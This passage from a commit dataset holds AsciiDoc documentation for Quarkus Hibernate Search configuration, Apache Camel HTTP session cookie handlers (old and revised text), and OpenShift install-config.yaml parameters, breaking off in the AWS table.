it.\n\nSee link:{hibernate-search-orm-elasticsearch-aws-guide}#aws-configuration-reference[the documentation for the Hibernate Search ORM + Elasticsearch AWS extension]\nfor more information.\n\n== Further reading\n\nIf you are interested in learning more about Hibernate Search 6,\nthe Hibernate team publishes link:{hibernate-search-doc-prefix}[an extensive reference documentation].\n\n== FAQ\n\n=== Why Elasticsearch only?\n\nHibernate Search supports both a Lucene backend and an Elasticsearch backend.\n\nIn the context of Quarkus and to build microservices, we thought the latter would make more sense.\nThus, we focused our efforts on it.\n\nWe don't have plans to support the Lucene backend in Quarkus for now.\n\n[[configuration-reference]]\n== Hibernate Search Configuration Reference\n\n[[configuration-reference-main]]\n=== Main Configuration\n\ninclude::{generated-dir}\/config\/quarkus-hibernate-search-orm-elasticsearch.adoc[leveloffset=+1, opts=optional]\n\n[NOTE]\n[[bean-reference-note-anchor]]\n.About bean references\n====\nWhen referencing beans using a string value in configuration properties, that string is parsed.\n\nHere are the most common formats:\n\n* `bean:` followed by the name of a `@Named` CDI bean.\nFor example `bean:myBean`.\n* `class:` followed by the fully-qualified name of a class, to be instantiated 
through CDI if it's a CDI bean,\nor through its public, no-argument constructor otherwise.\nFor example `class:com.mycompany.MyClass`.\n* An arbitrary string referencing a built-in implementation.\nAvailable values are detailed in the documentation of each configuration property,\nsuch as `async`\/`read-sync`\/`write-sync`\/`sync` for\n<<quarkus-hibernate-search-orm-elasticsearch_quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy,`quarkus.hibernate-search-orm.automatic-indexing.synchronization.strategy`>>.\n\nOther formats are also accepted, but are only useful for advanced use cases.\nSee link:{hibernate-search-doc-prefix}#configuration-bean-reference-parsing[this section of Hibernate Search's reference documentation]\nfor more information.\n====\n\n:no-duration-note: true\n\n[[configuration-reference-coordination-outbox-polling]]\n=== Configuration of coordination with outbox polling\n\nNOTE: These configuration properties require an additional extension. See <<coordination>>.\n\ninclude::{generated-dir}\/config\/quarkus-hibernate-search-orm-coordination-outboxpolling.adoc[leveloffset=+1, opts=optional]\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7aeecece07b585e39309f9bea8da4bdf0d2c69ad","subject":"Document Update (#4191)","message":"Document Update (#4191)\n\nAdded a space between Exchange and level","repos":"christophd\/camel,pax95\/camel,nikhilvibhav\/camel,tadayosi\/camel,tdiesler\/camel,mcollovati\/camel,gnodet\/camel,cunningt\/camel,gnodet\/camel,tadayosi\/camel,tdiesler\/camel,christophd\/camel,pax95\/camel,apache\/camel,pax95\/camel,tdiesler\/camel,mcollovati\/camel,mcollovati\/camel,cunningt\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pax95\/camel,tadayosi\/camel,cunningt\/camel,mcollovati\/camel,tdiesler\/camel,christophd\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,pmoerenhout\/camel,alvinkwekel\/camel,adessaigne\/camel,apache\/camel,pax95\/camel,adessaigne\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tdiesler\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,christophd\/camel,cunningt\/camel,adessaigne\/camel,cunningt\/camel,pax95\/camel,gnodet\/camel,nicolaferraro\/camel,pax95\/camel,gnodet\/camel,tadayosi\/camel,apache\/camel,adessaigne\/camel,tdiesler\/camel,pmoerenhout\/camel,adessaigne\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,christophd\/camel,nicolaferraro\/camel,pmoerenhout\/camel,pmoerenhout\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,cunningt\/camel,alvinkwekel\/camel,apache\/camel,nicolaferraro\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/http-session-handling.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/http-session-handling.adoc","new_contents":"[[HTTP-SessionHandling]]\n= HTTP Session Handling\n\n*Since Camel 2.19*\n\nSeveral Camel components can use HTTP as the underlying transport\nprotocol. In general, HTTP calls are stateless in nature; however, some\nservers allow state to be maintained via cookies. Cookies are often used to\nmaintain a server session (e.g. 
via a session cookie called \"JSESSIONID\"\nwith servers implementing the JEE Servlet specification).\n\n[[HTTP-SessionHandling-SessionScope]]\n== Session Scope\n\nIf a Camel route intends to implement some kind of HTTP session handling,\nthe scope of this session should be considered.\n\nIndependently of the session scope, the implementation must honor the\ndomain of the handled cookies.\n\n[[HTTP-SessionHandling-RouteContextScope]]\n== Route\/Context Scope\n\nIt might be desirable to have a single session for a route or a\nxref:camelcontext.adoc[CamelContext]. This essentially means that all\ncalls to a server issued from a route or CamelContext share a single\nHTTP session.\n\n[[HTTP-SessionHandling-EndpointScope]]\n== Endpoint Scope\n\nIt is also possible to have a session on an xref:endpoint.adoc[Endpoint]\nentity. This would mean that all invocations of an HTTP call issued by a\nsingle Endpoint share a session, whereas different Endpoints never share\nsessions, even if the call is sent to the same server.\nSome components, like camel-http, support endpoint-scoped\nsessions even prior to version 2.19.\n\n[[HTTP-SessionHandling-ExchangeScope]]\n== Exchange Scope\n\nThe third option to define a session scope is on\nxref:exchange.adoc[Exchange] level. This is particularly useful for\nscenarios where the server session is really maintaining state.\n\nIn this case the route could e.g. first do a login call, then some\nupdate calls and finally a logout call. If the session handling were\ndefined at route or CamelContext scope, this would seem to work; however,\nunder load, parallel invocations of the route would share a *single*\nsession, which could cause issues. If the session is defined on exchange\nscope, each invocation of the route will get a separate session and the\nserver can maintain a separate state for the different parallel\ninvocations.\n\n[[HTTP-SessionHandling-Usage]]\n== Usage\n\nIf you are a Camel user, you will see that several Camel components support\nthe cookieHandler parameter at the endpoint level. All you need to do is to\ninstantiate a cookie handler appropriate for your use case and\nreference it in the cookieHandler parameter for all endpoints that are\nsupposed to participate in the HTTP session.\n\nThere are two pre-implemented cookie handlers:\n`org.apache.camel.http.common.cookie.InstanceCookieHandler` and\n`org.apache.camel.http.common.cookie.ExchangeCookieHandler`.\n\nThe `InstanceCookieHandler` stores cookies in an instance of itself.\nYou can compare that with a browser instance that is shared between all\nthe endpoints that use it (and will be used for all invocations of these\nendpoints). If you want to maintain separate sessions for different\nendpoints or groups of endpoints, you may have multiple instances of the\n`InstanceCookieHandler`.\n\nThe `ExchangeCookieHandler` stores the session in the exchange. With the\nbrowser analogy, this means that each Exchange will get its own browser\ninstance (so sessions are separated). As the `ExchangeCookieHandler`\ndoes not store any state, it is generally not useful to have multiple\n`ExchangeCookieHandler` instances (as they would access the same data,\nanyway).\n\n[[HTTP-SessionHandling-Example]]\n== Example\n\nThe following three routes will each do two invocations of an echo REST\nservice. In the first route (without a cookie handler) each invocation\nwill get a new session. For the second route all invocations will share\na session. 
For the third route, the first and the second invocation\nwithin the route share a session, but different (even parallel)\ninvocations of the route will not share a session.\n\n[source,xml]\n--------------------------------------------------------------------------------------------------------\n <cxf:rsClient id=\"rsClientProxy\" address=\"http:\/\/127.0.0.1:8080\/CxfRsProducerSessionTest\/\"\n serviceClass=\"org.apache.camel.component.cxf.jaxrs.testbean.EchoService\"\n loggingFeatureEnabled=\"true\" \/>\n\n <camelContext id=\"camel\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:\/\/proxy\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy\"\/>\n <\/route>\n <route>\n <from uri=\"direct:\/\/proxyinstance\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#instanceCookieHandler\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#instanceCookieHandler\"\/>\n <\/route>\n <route>\n <from uri=\"direct:\/\/proxyexchange\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#exchangeCookieHandler\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#exchangeCookieHandler\"\/>\n <\/route>\n <\/camelContext>\n\n <bean id=\"instanceCookieHandler\" class=\"org.apache.camel.http.common.cookie.InstanceCookieHandler\"\/>\n <bean id=\"exchangeCookieHandler\" class=\"org.apache.camel.http.common.cookie.ExchangeCookieHandler\"\/> \n--------------------------------------------------------------------------------------------------------\n\n[[HTTP-SessionHandling-ComponentDevelopers]]\n== Component Developers\n\nIf you want to develop an HTTP-based component that is supposed to\nparticipate in a session, you have to add the following parts to your\ncode:\n\n1. Include a build reference to camel-http-common (if it is not already\nthere)\n2. Add a cookieHandler parameter to the endpoint class (together with\ngetter and setter)\n3. Before your code does the HTTP call, if a cookie handler is set on\nthe endpoint, perform a `cookieHandler.loadCookies(exchange, uri)` call.\nIt will return a `Map<String, List<String>>` containing the headers that\nneed to be sent to the server. The details of how you need to send these\nheaders to the server depend on the underlying HTTP API you are using.\n4. After your code receives the HTTP response, if a cookie handler\nis set on the endpoint, perform a\n`cookieHandler.storeCookies(exchange, uri, m)` call. `m` is a\n`Map<String, List<String>>` containing the HTTP headers returned from\nthe server.\n\n[[HTTP-SessionHandling-MoreInfo]]\n== More Info\n\nSome APIs provide more direct support for cookie handling. In this case\nit might be easier to get the underlying `java.net.CookieStore` with a\n`cookieManager.getCookieStore(exchange)` call and handle the cookies\nusing the cookie interface provided by the underlying library.\n\n","old_contents":"[[HTTP-SessionHandling]]\n= HTTP Session Handling\n\n*Since Camel 2.19*\n\nSeveral Camel components can use HTTP as the underlying transport\nprotocol. In general HTTP calls are stateless in nature, however some\nservers allow to maintain state via cookies. Cookies are often used to\nmaintain a server session (e.g. 
via a session cookie called \"JSESSIONID\"\nwith servers implementing the JEE Servlet specification).\n\n[[HTTP-SessionHandling-SessionScope]]\n== Session Scope\n\nIf a Camel route intends to implement some kind of HTTP session handling\nthe scope of this session should be considered.\n\nIndependently from the session scope the implementation must honor the\ndomain of the handled cookies.\n\n[[HTTP-SessionHandling-RouteContextScope]]\n== Route\/Context Scope\n\nIt might be desirable to have a single session for a route or a\nxref:camelcontext.adoc[CamelContext]. This essentially means that all\ncalls to a server issued from a route or CamelContext share a single\nHTTP session.\n\n[[HTTP-SessionHandling-EndpointScope]]\n== Endpoint Scope\n\nIt is also possible to have a session on an xref:endpoint.adoc[Endpoint]\nentity. This would mean that all invocations of an HTTP call issued by a\nsingle Endpoint share a session, whereas different Endpoints never share\nsessions, even if the call is sent to the same server. \nSome components like camel-http, and camel-http support endpoint scoped\nsessions even prior to version 2.19.\n\n[[HTTP-SessionHandling-ExchangeScope]]\n== Exchange Scope\n\nThe third option to define a session scope is on\nxref:exchange.adoc[Exchange]level. This is particularly useful for\nscenarios where the server session is really maintaining state.\n\nIn this case the route could e.g. first do a login call, then some\nupdate calls and finally a logout call. If the session handling would be\ndefined on route or CamelContext scopes this would seem to run, however\nunder load parallel invocations of the route would share a *single*\nsession, which could cause issues. If the session is defined on exchange\nscope, each invocation of the route will get a separate session and the\nserver can maintain a separate state for the different parallel\ninvocations.\n\n[[HTTP-SessionHandling-Usage]]\n== Usage\n\nIf you are a Camel user, you see that several Camel components support\nthe cookieHandler parameter on endpoint level. All you need to do is to\ninstantiate a cookie handler appropriate for your use case and\nreference it in the cookieHandler parameter for all endpoints that are\nsupposed to participate in the HTTP session.\n\nThere are two pre-implemented cookie handlers:\n`org.apache.camel.http.common.cookie.InstanceCookieHandler` and\n`org.apache.camel.http.common.cookie.ExchangeCookieHandler.`\n\nThe `InstanceCookieHandler` stores cookies in an instance of itself.\nYou can compare that with a browser instance that is shared between all\nthe endpoints that use it (and will be used for all invocations of these\nendpoints). If you want to maintain separate sessions for different\nendpoints or groups of endpoints you may have multiple instances of the\n`InstanceCookieHandler`.\n\nThe `ExchangeCookieHandler` stores the session in the exchange. With the\nbrowser analogy this means that each Exchange will get its own browser\ninstance (so sessions are separated). As the `ExchangeCookieHandler`\ndoes not store any state it is generally not useful to have multiple\n`ExchangeCookieHandler` instances (as they would access the same data,\nanyway).\n\n[[HTTP-SessionHandling-Example]]\n== Example\n\nThe following three routes will each do two invocations of an echo REST\nservice. In the first route (without a cookie handler) each invocation\nwill get a new session. For the second route all invocations will share\na session. 
For the third route the first and the second invocation\nwithin the route share a session, but different (even parallel)\ninvocations of the route will not share a session.\n\n[source,xml]\n--------------------------------------------------------------------------------------------------------\n <cxf:rsClient id=\"rsClientProxy\" address=\"http:\/\/127.0.0.1:8080\/CxfRsProducerSessionTest\/\"\n serviceClass=\"org.apache.camel.component.cxf.jaxrs.testbean.EchoService\"\n loggingFeatureEnabled=\"true\" \/>\n\n <camelContext id=\"camel\" xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route>\n <from uri=\"direct:\/\/proxy\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy\"\/>\n <\/route>\n <route>\n <from uri=\"direct:\/\/proxyinstance\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#instanceCookieHandler\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#instanceCookieHandler\"\/>\n <\/route>\n <route>\n <from uri=\"direct:\/\/proxyexchange\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#exchangeCookieHandler\"\/>\n <convertBodyTo type=\"java.lang.String\"\/>\n <to uri=\"cxfrs:\/\/bean:\/\/rsClientProxy?cookieHandler=#exchangeCookieHandler\"\/>\n <\/route>\n <\/camelContext>\n\n <bean id=\"instanceCookieHandler\" class=\"org.apache.camel.http.common.cookie.InstanceCookieHandler\"\/>\n <bean id=\"exchangeCookieHandler\" class=\"org.apache.camel.http.common.cookie.ExchangeCookieHandler\"\/> \n--------------------------------------------------------------------------------------------------------\n\n[[HTTP-SessionHandling-ComponentDevelopers]]\n== Component Developers\n\nIf you want to develop a HTTP based component that is supposed to\nparticipate in a session you have to add the following parts to your\ncode:\n\n1. Include a build reference to camel-http-common (if it is not already\nthere)\n2. Add a cookieHandler parameter to the endpoint class (together with\ngetter and setter)\n3. Before your code does the HTTP call, if a cookie handler is set on\nthe endpoint perform a `cookieHandler.loadCookies(exchange, uri)` call.\nIt will return a `Map<String, List<String>>` containing the headers that\nneed to be sent to the server. The details how you need to send these\nheaders to the server depend on the underlying HTTP API you are using.\n4. After your code does receive the HTTP response if a cookie handler\nis set on the endpoint perform a\n`cookieHandler.storeCookies(exchange, uri, m)` call. `m` is a\n`Map<String, List<String>>` containing the HTTP headers returned from\nthe server.\n\n[[HTTP-SessionHandling-MoreInfo]]\n== More Info\n\nSome APIs provide more direct support for cookie handling. 
In this case\nit might be easier to get the underlying `java.net.CookieStore` with a\n`cookeManager.getCookieStore(exchange)` call and handle the cookies\nusing the cookie interface provided by the underlying library.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"569d409a2725b60ea7f474126d60a5d9310d5406","subject":"Document OSP PV limit workaround","message":"Document OSP PV limit workaround\n\nCommit implements https:\/\/issues.redhat.com\/browse\/OSDOCS-1278\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/installation-configuration-parameters.adoc","new_file":"modules\/installation-configuration-parameters.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * installing\/installing_aws\/installing-aws-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-government-region.adoc\n\/\/ * installing\/installing_aws\/installing-aws-network-customizations.adoc\n\/\/ * installing\/installing_aws\/installing-aws-private.adoc\n\/\/ * installing\/installing_aws\/installing-aws-vpc.adoc\n\/\/ * installing\/installing_azure\/installing-azure-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-government-region.adoc\n\/\/ * installing\/installing_azure\/installing-azure-network-customizations.adoc\n\/\/ * installing\/installing_azure\/installing-azure-private.adoc\n\/\/ * installing\/installing_azure\/installing-azure-vnet.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-private.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-network-customizations.adoc\n\/\/ * installing\/installing_gcp\/installing-gcp-vpc.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-custom.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-installer-kuryr.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user.adoc\n\/\/ * installing\/installing_openstack\/installing-openstack-user-kuryr.adoc\n\/\/ * installing\/installing_rhv\/installing-rhv-custom.adoc\n\/\/ * installing\/installing_vsphere\/installing-vsphere-installer-provisioned-customizations.adoc\n\nifeval::[\"{context}\" == \"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-government-region\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-network-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-private\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-aws-vpc\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-government-region\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-network-customizations\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-private\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-azure-vnet\"]\n:azure:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-private\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-network-customizations\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == \"installing-gcp-vpc\"]\n:gcp:\nendif::[]\nifeval::[\"{context}\" == 
\"installing-aws-customizations\"]\n:aws:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-custom\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user\"]\n:osp:\n:osp-custom:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-user-kuryr\"]\n:osp:\n:osp-kuryr:\nendif::[]\nifeval::[\"{context}\" == \"installing-rhv-customizations\"]\n:rhv:\nendif::[]\nifeval::[\"{context}\" == \"installing-vsphere-installer-provisioned-customizations\"]\n:vsphere:\nendif::[]\nifeval::[\"{context}\" == \"installing-openstack-installer-restricted\"]\n:osp:\n:osp-custom:\nendif::[]\n\n\n[id=\"installation-configuration-parameters_{context}\"]\n= Installation configuration parameters\n\nBefore you deploy an {product-title} cluster, you provide parameter values to describe your account on the cloud platform that hosts your cluster and optionally customize your cluster's platform. When you create the `install-config.yaml` installation configuration file, you provide values for the required parameters through the command line. If you customize your cluster, you can modify the `install-config.yaml` file to provide more details about the platform.\n\n[NOTE]\n====\nAfter installation, you cannot modify these parameters in the `install-config.yaml` file.\n====\n\n.Required parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`apiVersion`\n|The API version for the `install-config.yaml` content. The current version is `v1`. The installer may also support older API versions.\n|String\n\n|`baseDomain`\n|The base domain of your cloud provider. The base domain is used to create routes to your {product-title} cluster components. The full DNS name for your cluster is a combination of the `baseDomain` and `metadata.name` parameter values that uses the `<metadata.name>.<baseDomain>` format.\n|A fully-qualified domain or subdomain name, such as `example.com`.\n\n|`metadata`\n|Kubernetes resource `ObjectMeta`, from which only the `name` parameter is consumed.\n|Object\n\n|`metadata.name`\n|The name of the cluster. DNS records for the cluster are all subdomains of `{{.metadata.name}}.{{.baseDomain}}`.\n|String of lowercase letters, hyphens (`-`), and periods (`.`), such as `dev`.\nifdef::osp[]\nThe string must be 14 characters or fewer long.\nendif::osp[]\n\n|`platform`\n|The configuration for the specific platform upon which to perform the installation: `aws`, `baremetal`, `azure`, `openstack`, `ovirt`, `vsphere`. For additional information about `platform.<platform>` parameters, consult the following table for your specific platform.\n|Object\n\nifndef::openshift-origin[]\n|`pullSecret`\n|Get this pull secret from link:https:\/\/cloud.redhat.com\/openshift\/install\/pull-secret[] to authenticate downloading container images for {product-title} components from services such as Quay.io.\n|\n[source,json]\n----\n{\n \"auths\":{\n \"cloud.openshift.com\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n },\n \"quay.io\":{\n \"auth\":\"b3Blb=\",\n \"email\":\"you@example.com\"\n }\n }\n}\n----\nendif::[]\n\n|====\n\n.Optional parameters\n[cols=\".^2,.^3a,.^3a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`additionalTrustBundle`\n|A PEM-encoded X.509 certificate bundle that is added to the nodes' trusted certificate store. 
This trust bundle may also be used when a proxy has been configured.\n|String\n\n|`compute`\n|The configuration for the machines that comprise the compute nodes.\n|Array of machine-pool objects. For details, see the following \"Machine-pool\" table.\n\n|`compute.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`compute.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on compute machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`compute.name`\n|Required if you use `compute`. The name of the machine pool.\n|`worker`\n\n|`compute.platform`\n|Required if you use `compute`. Use this parameter to specify the cloud provider to host the worker machines. This parameter value must match the `controlPlane.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`compute.replicas`\n|The number of compute machines, which are also known as worker machines, to provision.\n|A positive integer greater than or equal to `2`. The default value is `3`.\n\n|`controlPlane`\n|The configuration for the machines that comprise the control plane.\n|Array of `MachinePool` objects. For details, see the following \"Machine-pool\" table.\n\n|`controlPlane.architecture`\n|Determines the instruction set architecture of the machines in the pool. Currently, heterogeneous clusters are not supported, so all pools must specify the same architecture. Valid values are `amd64` (the default).\n|String\n\n|`controlPlane.hyperthreading`\n|Whether to enable or disable simultaneous multithreading, or `hyperthreading`, on control plane machines. By default, simultaneous multithreading is enabled to increase the performance of your machines' cores.\n[IMPORTANT]\n====\nIf you disable simultaneous multithreading, ensure that your capacity planning\naccounts for the dramatically decreased machine performance.\n====\n|`Enabled` or `Disabled`\n\n|`controlPlane.name`\n|Required if you use `controlPlane`. The name of the machine pool.\n|`master`\n\n|`controlPlane.platform`\n|Required if you use `controlPlane`. Use this parameter to specify the cloud provider that hosts the control plane machines. This parameter value must match the `compute.platform` parameter value.\n|`aws`, `azure`, `gcp`, `openstack`, `ovirt`, `vsphere`, or `{}`\n\n|`controlPlane.replicas`\n|The number of control plane machines to provision.\n|The only supported value is `3`, which is the default value.\n\n|`credentialsMode`\n|The Cloud Credential Operator (CCO) mode. If no mode is specified, the CCO dynamically tries to determine the capabilities of the provided credentials, with a preference for mint mode on the platforms where multiple modes are supported.\n[NOTE]\n====\nNot all CCO modes are supported for all cloud providers. For more information on CCO modes, see the _Cloud Credential Operator_ entry in the _Red Hat Operators reference_ content.\n====\n|`Mint`, `Passthrough`, `Manual`, or an empty string (`\"\"`).\n\n|`fips`\n|Enable or disable FIPS mode. The default is `false` (disabled). 
If FIPS mode is enabled, the {op-system-first} machines that {product-title} runs on bypass the default Kubernetes cryptography suite and use the cryptography modules that are provided with {op-system} instead.\n|`false` or `true`\n\n|`imageContentSources`\n|Sources and repositories for the release-image content.\n|Array of objects. Includes a `source` and, optionally, `mirrors`, as described in the following rows of this table.\n\n|`imageContentSources.source`\n|Required if you use `imageContentSources`. Specify the repository that users refer to, for example, in image pull specifications.\n|String\n\n|`imageContentSources.mirrors`\n|Specify one or more repositories that may also contain the same images.\n|Array of strings\n\n|`networking`\n|The configuration for the pod network provider in the cluster.\n|Object\n\n|`networking.clusterNetwork`\n|The IP address pools for pods. The default is `10.128.0.0\/14` with a host prefix of `\/23`.\n|Array of objects\n\n|`networking.clusterNetwork.cidr`\n|Required if you use `networking.clusterNetwork`. The IP block address pool.\n|IP network. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`networking.clusterNetwork.hostPrefix`\n|Required if you use `networking.clusterNetwork`. The prefix size to allocate to each node from the CIDR. For example, 24 would allocate 2^8=256 addresses to each node.\n|Integer\n\n|`networking.machineNetwork`\n|The IP address pools for machines.\n|Array of objects\n\n|`networking.machineNetwork.cidr`\n|Required if you use `networking.machineNetwork`. The IP block address pool. The default is `10.0.0.0\/16` for all platforms other than libvirt. For libvirt, the default is `192.168.126.0\/24`.\n|IP network. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`networking.networkType`\n|The type of network to install. The default is `OpenShiftSDN`.\n|String\n\n|`networking.serviceNetwork`\n|The IP address pools for services. The default is 172.30.0.0\/16.\n|Array of IP networks. IP networks are represented as strings using Classless Inter-Domain Routing (CIDR) notation with a traditional IP address or network number, followed by the forward slash (\/) character, followed by a decimal value between 0 and 32 that describes the number of significant bits. For example, `10.0.0.0\/16` represents IP addresses `10.0.0.0` through `10.0.255.255`.\n\n|`publish`\n|How to publish or expose the user-facing endpoints of your cluster, such as the Kubernetes API, OpenShift routes.\n|`Internal` or `External`. To deploy a private cluster, which cannot be accessed from the internet, set `publish` to `Internal`. 
The default value is `External`.\n\n|`sshKey`\n| The SSH key or keys to authenticate access to your cluster machines.\n[NOTE]\n====\nFor production {product-title} clusters on which you want to perform installation debugging or disaster recovery, specify an SSH key that your `ssh-agent` process uses.\n====\na|One or more keys. For example:\n```\nsshKey:\n  key1...\n  key2...\n  key3...\n```\n|====\n\n\nifdef::aws[]\n.Optional AWS parameters\n[cols=\".^2,.^3,.^5a\",options=\"header\"]\n|====\n|Parameter|Description|Values\n\n|`compute.platform.aws.amiID`\n|The AWS AMI used to boot compute machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`compute.platform.aws.rootVolume.iops`\n|The Input\/Output Operations Per Second (IOPS) that is reserved for the root volume.\n|Integer, for example `4000`.\n\n|`compute.platform.aws.rootVolume.size`\n|The size in GiB of the root volume.\n|Integer, for example `500`.\n\n|`compute.platform.aws.rootVolume.type`\n|The instance type of the root volume.\n|Valid link:https:\/\/docs.aws.amazon.com\/AWSEC2\/latest\/UserGuide\/EBSVolumeTypes.html[AWS EBS instance type],\nsuch as `io1`.\n\n|`compute.platform.aws.type`\n|The EC2 instance type for the compute machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`compute.platform.aws.zones`\n|The availability zones where the installation program creates machines for the compute machine pool. If you provide your own VPC, you must provide a subnet in that availability zone.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a\nlink:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`compute.aws.region`\n|The AWS region that the installation program creates compute resources in.\n|Any valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`controlPlane.platform.aws.amiID`\n|The AWS AMI used to boot control plane machines for the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`controlPlane.platform.aws.type`\n|The EC2 instance type for the control plane machines.\n|Valid link:https:\/\/aws.amazon.com\/ec2\/instance-types\/[AWS instance type], such as `c5.9xlarge`.\n\n|`controlPlane.platform.aws.zones`\n|The availability zones where the installation program creates machines for the\ncontrol plane machine pool.\n|A list of valid AWS availability zones, such as `us-east-1c`, in a link:https:\/\/yaml.org\/spec\/1.2\/spec.html#sequence\/\/[YAML sequence].\n\n|`controlPlane.aws.region`\n|The AWS region that the installation program creates control plane resources in.\n|Valid link:https:\/\/docs.aws.amazon.com\/general\/latest\/gr\/rande.html[AWS region], such as `us-east-1`.\n\n|`platform.aws.amiID`\n|The AWS AMI used to boot all machines for the cluster. If set, the AMI must\nbelong to the same region as the cluster. This is required for regions that require a custom {op-system} AMI.\n|Any published or custom {op-system} AMI that belongs to the set AWS region.\n\n|`platform.aws.serviceEndpoints.name`\n|The AWS service endpoint name. Custom endpoints are only required for cases\nwhere alternative AWS endpoints, like FIPS, must be used. 
